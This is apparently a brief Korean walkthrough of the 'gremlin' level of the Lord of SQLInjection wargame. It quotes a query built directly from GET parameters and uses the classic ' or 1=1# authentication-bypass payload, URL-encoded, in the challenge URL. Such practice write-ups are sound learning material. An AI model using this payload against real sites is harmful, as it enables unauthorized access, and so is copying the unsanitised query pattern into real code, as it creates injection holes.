Lord of SQLInjection: gremlin

"select id from prob_gremlin where id=’{$_GET[id]}’ and pw=’{$_GET[pw]}’”; 

get 방식으로 받은 변수를 위 코드에 넣어서 쿼리를 실행하고있습니다.

쿼리의 실행 결과가 존재하면 클리어하는 코드가 짜여져있습니다.
싱글 쿼츠를 필터링하고 있지 않으니, id에 'or 1=1를 넣고 뒤를 주석 처리해 조건을 참으로 만들어주겠습니다.

주소에 아래와 같이 입력합니다.
' or 1=1#를 url 인코딩을 통해 %27%20or%201=1%23으로 입력해줍니다.

https://los.rubiya.kr//chall/gremlin_280c5552de8b681110e9287421b834fd.php ?id=%27%20or%201=1%23


gremlin 단계를 클리어했습니다.

좋은 웹페이지 즐겨찾기